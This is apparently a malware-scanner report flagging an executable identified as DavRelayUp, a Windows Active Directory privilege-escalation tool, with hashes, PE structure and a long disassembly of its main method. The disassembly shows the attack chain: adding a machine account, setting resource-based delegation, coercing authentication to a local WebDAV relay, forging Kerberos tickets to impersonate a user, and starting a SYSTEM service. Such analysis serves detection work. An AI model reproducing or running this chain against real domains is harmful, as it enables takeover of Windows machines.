Suspicious
Suspect

0add16e3e96c888ca55a4566e04c000f

PE Executable
|
MD5: 0add16e3e96c888ca55a4566e04c000f
|
Size: 4.86 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
0add16e3e96c888ca55a4566e04c000f
Sha1
fd67dfbaf37099e17778f405c4db8ccf03b18325
Sha256
ebd21ac4ac71e466c1441dd998895dc5f9567d3ca999a30762f6028dfc59b4d5
Sha384
f0188744b36eea3350d636556747812b0624c89d5014c2b05139bb612a6c4fa9a72bb4acfc81d681a98fb45b269d2a02
Sha512
0b20d6419e8ccf8bc4d20d7336e539a613104e5768f64c321bd3d0316e46534050a138347c899f14509b7a621d7b4d9ea9e01ca4874be3ef938b1fc6f664d571
SSDeep
49152:YqCFngKJITFDv6Vrb/TkvO90dL3BmAFd4A64nsfJQ2UnN05yOs88rQdzVezf6jI0:YHqKJGbRrNnAdhWELZkj4EQ0DLU
TLSH
3D265B4FF89141B8C4AED634CAA59E527B31B884173123D72F71A6B62E33BD45EB8350

PeID

HQR data file
Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
0add16e3e96c888ca55a4566e04c000f
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
DavRelayUp.Costura64.GoRelayServer.dll
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.data
.rdata
.pdata
.xdata
.bss
.edata
.idata
.CRT
.tls
.reloc
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: H:\DavRelayUp-master\DavRelayUp-master\DavRelayUp\obj\Release\DavRelayUp.pdb
Module Name

DavRelayUp.exe
Full Name

DavRelayUp.exe
EntryPoint

System.Void DavRelayUp.Program::Main(System.String[])
Scope Name

DavRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DavRelayUp
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1043
Main Method

System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count

672
Main IL

newobj System.Void DavRelayUp.Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> nop <null> ldstr DavRelayUp - Relaying you to SYSTEM, again... call System.Void System.Console::WriteLine(System.String) nop <null> ldarg.0 <null> call System.Boolean DavRelayUp.Options::ParseArgs(System.String[]) ldc.i4.0 <null> ceq <null> stloc.s V_13 ldloc.s V_13 brfalse.s IL_0026: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.0 <null> ceq <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_0051: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase nop <null> nop <null> ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) nop <null> nop <null> leave.s IL_004C: br IL_07B6 pop <null> nop <null> nop <null> leave.s IL_004C: br IL_07B6 br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_006B: call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> br IL_07B6: ret call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() ldc.i4.0 <null> ceq <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_008A: ldstr "[+] WebClient Service started successfully" nop <null> ldstr [-] Failed to start WebClient Service call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret ldstr [+] WebClient Service started successfully call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_00AD: ldc.i4.1 ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) br.s IL_00AE: stloc.s V_17 ldc.i4.1 <null> stloc.s V_17 ldloc.s V_17 brfalse.s IL_00C9: ldsfld System.String DavRelayUp.Options::domainController nop <null> call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldc.i4.0 <null> ceq <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_00C8: nop br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_010E: ldsfld System.String DavRelayUp.Options::domain nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_20 ldloc.s V_20 brfalse.s IL_010D: nop nop <null> ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) stloc.1 <null> ldloc.1 <null> newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.2 <null> ldloc.0 <null> ldstr {0}:{1} ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldsfld System.Boolean DavRelayUp.Options::useSSL stloc.s V_21 ldloc.s V_21 brfalse.s IL_0192: nop nop <null> ldloc.0 <null> ldstr ldaps:// ldloc.0 <null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) nop <null> nop <null> br.s IL_01C4: ldloc.2 nop <null> ldloc.0 <null> ldstr ldap:// ldloc.0 <null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) nop <null> nop <null> ldloc.2 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() nop <null> ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount stloc.s V_22 ldloc.s V_22 brfalse IL_03C7: ldloc.2 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_24 ldloc.s V_24 brfalse.s IL_01F6: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Program::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.s V_23 ldloc.s V_23 ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) nop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> nop <null> ldloc.2 <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) stloc.s V_25 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_03C6: nop stloc.s V_26 nop <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) nop <null> ldstr [-] ldloc.s V_26 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_07B6: ret nop <null> ldloc.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectSID() stsfld System.String DavRelayUp.Options::rbcdComputerSid ldsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_28 ldloc.s V_28 brfalse.s IL_03FA: ldloc.2 br IL_07B6: ret ldloc.2 <null> call System.String System.Environment::get_MachineName() ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectDN() stsfld System.String DavRelayUp.Options::targetComputerDN ldsfld System.String DavRelayUp.Options::targetComputerDN call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_29 ldloc.s V_29 brfalse.s IL_042D: ldsfld System.String DavRelayUp.Options::targetComputerDN br IL_07B6: ret ldsfld System.String DavRelayUp.Options::targetComputerDN ldstr ldstr \20 callvirt System.String System.String::Replace(System.String,System.String) stsfld System.String DavRelayUp.Options::targetComputerDN ldstr O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;; ldsfld System.String DavRelayUp.Options::rbcdComputerSid ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stloc.3 <null> ldloc.3 <null> newobj System.Void System.Security.AccessControl.RawSecurityDescriptor::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Int32 System.Security.AccessControl.GenericSecurityDescriptor::get_BinaryLength() newarr System.Byte stloc.s V_5 ldloc.s V_4 ldloc.s V_5 ldc.i4.0 <null> callvirt System.Void System.Security.AccessControl.GenericSecurityDescriptor::GetBinaryForm(System.Byte[],System.Int32) nop <null> ldloc.0 <null> ldloc.s V_5 call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::b64_sd ldloc.0 <null> ldftn System.Void DavRelayUp.Program/<>c__DisplayClass1_0::<Main>b__0() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) stloc.s V_6 ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Void DavRelayUp.KrbSCM::HookSecurityContext() nop <null> ldstr 127.0.0.1 call System.String System.Environment::get_MachineName() ldsfld System.Int32 DavRelayUp.Options::webdavServerPort ldc.i4.2 <null> call System.Void DavRelayUp.AuthTrigger.EfsTrigger::Trigger(System.String,System.String,System.Int32,DavRelayUp.AuthTrigger.EfsTrigger/ApiCall) nop <null> ldc.i4.1 <null> stsfld System.Boolean DavRelayUp.Options::triggerDone ldloc.s V_6 callvirt System.Void System.Threading.Tasks.Task::Wait() nop <null> ldnull <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_30 ldloc.s V_30 brfalse.s IL_054E: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash nop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_31 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_9 ldc.i4.s 18 stloc.s V_8 nop <null> br.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_32 ldloc.s V_32 brfalse.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_9 ldc.i4.s 23 stloc.s V_8 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_9 ldloc.s V_8 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_33 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_33 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_10 ldloc.s V_10 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_11 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_34 ldloc.s V_34 brfalse.s IL_05FC: ldloc.s V_11 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_11 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_35 ldloc.s V_35 brfalse.s IL_0697: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_12 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_12 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_36 ldloc.s V_36 brfalse.s IL_0712: ldc.i4 2500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.s V_7 call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4 2500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly stloc.s V_37 ldloc.s V_37 brfalse IL_07AE: nop nop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_39 ldloc.s V_39 brfalse.s IL_0772: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_38 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_40 ldloc.s V_40 brfalse.s IL_079D: ldloc.s V_38 ldloc.s V_38 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldloc.s V_38 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.s V_7 call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> nop <null> br.s IL_07B6: ret nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> nop <null> ret <null>
0add16e3e96c888ca55a4566e04c000f (4.86 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙